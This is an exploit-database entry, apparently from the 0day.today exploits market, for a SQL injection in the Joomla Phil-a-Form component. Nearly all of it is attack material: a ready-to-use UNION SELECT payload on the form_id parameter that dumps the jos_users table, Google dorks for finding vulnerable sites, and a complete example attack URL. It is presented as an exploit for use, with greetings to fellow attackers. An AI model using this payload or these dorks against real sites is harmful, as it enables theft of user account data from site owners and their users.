[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component Phil-a-Form SQL Injection Vulnerability

Author
Emre5807
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12354
Category
web applications
Date add
22-05-2010
Platform
php
========================================================
Joomla Component Phil-a-Form SQL Injection Vulnerability
========================================================


[+] Vulnerable File :


http://127.0.0.1/index.php?option=com_philaform&Itemid=15&form_id=[SQL]


[+] ExploiT :

-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+

jos_users--


[+] G00gle Dork :

inurl:com_philaform

inurl:index.php?option=com_philaform&Itemid=15&form_id=


[+] Example :

http://127.0.0.1/index.php?option=com_philaform&Itemid=15&form_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+jos_users--


##############################################################################################################
# Greetz : CodeS - жlЭM - VatanAy - TurkishWarrior - DJ_K_A_H_I_R - LegenDSemih - Enes_60 - Gamoscu - Manas58
##############################################################################################################



#  0day.today [2024-12-25]  #